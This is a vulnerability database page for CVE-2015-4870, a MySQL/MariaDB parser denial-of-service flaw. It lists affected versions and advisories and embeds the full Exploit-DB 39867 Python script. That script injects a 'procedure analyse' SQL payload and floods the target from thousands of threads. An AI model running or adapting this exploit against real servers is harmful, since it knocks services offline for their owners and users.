Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| No informations. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4 | AV:N/AC:L/Au:S/C:N/I:N/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 39867
Publication date : 2016-05-29 22h00 +00:00
Author : Osanda Malith Jayathissa
EDB Verified : No
#!/usr/bin/env python
# Title: MySQL Procedure Analyse DoS Exploit
# Author: Osanda Malith Jayathissa (@OsandaMalith)
# E-Mail: osanda[cat]unseen.is
# Version: Vulnerable upto MySQL 5.5.45
# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
# This exploit is compatible with both Python 3.x and 2.x
# CVE: CVE-2015-4870
from __future__ import print_function
import threading
import time
import sys
import os
try:
import urllib.request as urllib2
import urllib.parse as urllib
except ImportError:
import urllib2
import urllib
try: input = raw_input
except NameError: pass
host = "http://host/xxx.php?id=1'"
payload = " procedure analyse((select*from(select 1)x),1)-- -"
payload = urllib.quote(payload)
url = host + payload
req = urllib2.Request(url)
req.add_header('Accept', '*/*')
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
req.add_header('Connection', '')
req.add_header('Content-type', 'text/xml')
cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')
class DoS(threading.Thread):
def run(self):
print("{0} started!".format(self.getName()))
for i in range(100):
urllib2.urlopen(req)
time.sleep(.2)
print("{0} finished!".format(self.getName()))
def banner():
print ('''
____ _____ __
/'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __
\\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
\\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
\\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
/\\___/
\\/__/
____ ____
/\\ _`\\ /\\ _`\\
\\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
\\ \\ \\ \\ \\ / __`\\/_\\__ \\
\\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
\\ \\____/\\ \\____/\\ `\\____\\
\\/___/ \\/___/ \\/_____/
[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
[*] E-Mail: osanda[cat]unseen.is
[*] Website: http://osandamalith.wordpress.com
[!] Author takes no responsibility of any damage you cause
[!] Strictly for Educational purposes only
''')
print("[*] Host: {0}".format(host))
input("\n\t[-] Press Return to launch the attack\n")
def _start():
try:
cls()
banner()
for i in range(10000):
thread = DoS(name = "[+] Thread-{0}".format(i + 1))
thread.start()
time.sleep(.1)
except KeyboardInterrupt:
print ('\n[!] Ctrl + C detected\n[!] Exiting')
sys.exit(0)
except EOFError:
print ('\n[!] Ctrl + D detected\n[!] Exiting')
sys.exit(0)
if __name__ == '__main__':
_start()
Products Mentioned
Configuraton 0
Oracle>>Linux >> Version 7
- Oracle>>Linux >> Version 7 (Open CPE detail)
Oracle>>Solaris >> Version 11.3
- Oracle>>Solaris >> Version 11.3 (Open CPE detail)
Configuraton 0
Opensuse>>Leap >> Version 42.1
- Opensuse>>Leap >> Version 42.1 (Open CPE detail)
Opensuse>>Opensuse >> Version 13.1
- Opensuse>>Opensuse >> Version 13.1 (Open CPE detail)
Opensuse>>Opensuse >> Version 13.2
- Opensuse>>Opensuse >> Version 13.2 (Open CPE detail)
Configuraton 0
Oracle>>Mysql >> Version From (including) 5.5.0 To (including) 5.5.45
- Oracle>>Mysql >> Version 5.5.0 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.1 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.2 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.3 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.4 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.5 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.6 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.7 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.8 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.9 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.10 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.11 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.12 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.13 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.14 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.15 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.16 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.17 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.18 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.19 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.20 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.21 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.22 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.23 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.24 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.25 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.25 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.26 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.27 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.28 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.29 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.30 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.31 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.32 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.33 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.34 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.35 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.36 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.37 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.38 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.39 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.40 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.41 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.42 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.43 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.44 (Open CPE detail)
- Oracle>>Mysql >> Version 5.5.45 (Open CPE detail)
Oracle>>Mysql >> Version From (including) 5.6.0 To (including) 5.6.26
- Oracle>>Mysql >> Version 5.6.0 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.0 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.1 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.2 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.3 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.4 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.5 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.6 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.7 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.8 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.9 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.10 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.11 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.12 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.13 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.14 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.15 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.16 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.17 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.18 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.19 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.20 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.21 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.22 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.23 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.24 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.25 (Open CPE detail)
- Oracle>>Mysql >> Version 5.6.26 (Open CPE detail)
Configuraton 0
Mariadb>>Mariadb >> Version From (including) 5.5.0 To (excluding) 5.5.46
- Mariadb>>Mariadb >> Version 5.5.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.20 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.21 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.22 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.23 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.24 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.25 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.27 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.28 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.28a (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.33 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.33 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.34 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.35 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.40 (Open CPE detail)
- Mariadb>>Mariadb >> Version 5.5.43 (Open CPE detail)
Mariadb>>Mariadb >> Version From (including) 10.0.0 To (excluding) 10.0.22
- Mariadb>>Mariadb >> Version 10.0.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.1 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.2 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.3 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.4 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.5 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.6 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.7 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.8 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.9 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.10 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.11 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.12 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.13 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.14 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.15 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.16 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.17 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.18 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.19 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.20 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.0.21 (Open CPE detail)
Mariadb>>Mariadb >> Version From (including) 10.1.0 To (excluding) 10.1.8
- Mariadb>>Mariadb >> Version 10.1.0 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.1 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.2 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.3 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.4 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.5 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.6 (Open CPE detail)
- Mariadb>>Mariadb >> Version 10.1.7 (Open CPE detail)
Configuraton 0
Canonical>>Ubuntu_linux >> Version 12.04
- Canonical>>Ubuntu_linux >> Version 12.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 14.04
- Canonical>>Ubuntu_linux >> Version 14.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 15.04
- Canonical>>Ubuntu_linux >> Version 15.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 15.10
- Canonical>>Ubuntu_linux >> Version 15.10 (Open CPE detail)
Configuraton 0
Debian>>Debian_linux >> Version 7.0
- Debian>>Debian_linux >> Version 7.0 (Open CPE detail)
Debian>>Debian_linux >> Version 8.0
- Debian>>Debian_linux >> Version 8.0 (Open CPE detail)
Configuraton 0
Redhat>>Enterprise_linux_desktop >> Version 7.0
- Redhat>>Enterprise_linux_desktop >> Version 7.0 (Open CPE detail)
- Redhat>>Enterprise_linux_desktop >> Version 7.0 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.1
- Redhat>>Enterprise_linux_eus >> Version 7.1 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.2
- Redhat>>Enterprise_linux_eus >> Version 7.2 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.3
- Redhat>>Enterprise_linux_eus >> Version 7.3 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.4
- Redhat>>Enterprise_linux_eus >> Version 7.4 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.5
- Redhat>>Enterprise_linux_eus >> Version 7.5 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.6
- Redhat>>Enterprise_linux_eus >> Version 7.6 (Open CPE detail)
Redhat>>Enterprise_linux_eus >> Version 7.7
- Redhat>>Enterprise_linux_eus >> Version 7.7 (Open CPE detail)
Redhat>>Enterprise_linux_server >> Version 7.0
- Redhat>>Enterprise_linux_server >> Version 7.0 (Open CPE detail)
- Redhat>>Enterprise_linux_server >> Version 7.0 (Open CPE detail)
Redhat>>Enterprise_linux_server_aus >> Version 7.3
- Redhat>>Enterprise_linux_server_aus >> Version 7.3 (Open CPE detail)
Redhat>>Enterprise_linux_server_aus >> Version 7.4
- Redhat>>Enterprise_linux_server_aus >> Version 7.4 (Open CPE detail)
Redhat>>Enterprise_linux_server_aus >> Version 7.6
- Redhat>>Enterprise_linux_server_aus >> Version 7.6 (Open CPE detail)
Redhat>>Enterprise_linux_server_aus >> Version 7.7
- Redhat>>Enterprise_linux_server_aus >> Version 7.7 (Open CPE detail)
Redhat>>Enterprise_linux_server_tus >> Version 7.3
- Redhat>>Enterprise_linux_server_tus >> Version 7.3 (Open CPE detail)
Redhat>>Enterprise_linux_server_tus >> Version 7.6
- Redhat>>Enterprise_linux_server_tus >> Version 7.6 (Open CPE detail)
Redhat>>Enterprise_linux_server_tus >> Version 7.7
- Redhat>>Enterprise_linux_server_tus >> Version 7.7 (Open CPE detail)
Redhat>>Enterprise_linux_workstation >> Version 7.0
- Redhat>>Enterprise_linux_workstation >> Version 7.0 (Open CPE detail)
- Redhat>>Enterprise_linux_workstation >> Version 7.0 (Open CPE detail)
Configuraton 0
Fedoraproject>>Fedora >> Version 23
- Fedoraproject>>Fedora >> Version 23 (Open CPE detail)
References
http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00010.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://www.suse.com/support/update/announcement/2016/suse-su-20160296-1.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://packetstormsecurity.com/files/137232/MySQL-Procedure-Analyse-Denial-Of-Service.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00011.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-updates/2016-02/msg00039.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177539.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
2025©
tesweb SA
